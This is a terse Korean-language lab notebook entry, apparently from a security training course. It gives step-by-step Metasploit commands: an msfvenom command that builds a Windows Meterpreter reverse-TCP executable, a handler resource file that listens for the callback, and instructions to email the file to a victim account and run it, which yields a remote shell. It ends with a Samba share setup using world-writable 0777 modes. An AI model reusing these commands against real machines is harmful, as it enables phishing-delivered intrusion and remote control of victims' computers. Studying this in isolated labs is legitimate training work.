2024년 2월 23일
방화벽 inside --any--> outside, any(꼭 추가해줘야 된다) 칼리 apt install fcitx-lib* -y nano malware.rc use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 100.100.100.1 set lport 4444 exploit msfvenom -p windows/meterpreter/reverse_tcp LHOST=100.100.100.1 -f exe -o payload.exe #악성파일 만들기 kali-evolution kali@mail.st.au로 payload.exe(악성파일) master@mail.st.au로 보내기 kali msfconsole -r mulware.rc 윈도우 thunderbird에서 악성파일 다운로드 받은 후 실행 kali -> msfconsole창에서 윈도우의 cmd환경으로 바뀜 미션 정책을 추가 또는 변경을 통해서 inside에서 kali까지 접속하기 1. 네트워크 연결 확인 2. 메일 서버 확인 3. 방화벽 확인 hacker <--> manager 미션 삼바를 활성화 시켜라!! groupadd sambaGroup chgrp sambaGroup /home/master chmod 770 /home/master usermod -G sambaGroup master smbpasswd -a master nano /etc/samba/smb.conf workgroup = WORKGROUP #아래 2줄은 workgroup ~~ 아래 직접 타이핑 unix charset = UTF-8 map to guest = Bad User #[profile] #~~~ #여기 밑에 추가해주기 [web] path = /home/master writable = yes guest ok = no create mode = 0777 directory mode = 0777 valid users = @sambaGroup systemctl restart smbd kali show_mount ls cd :z ls 등등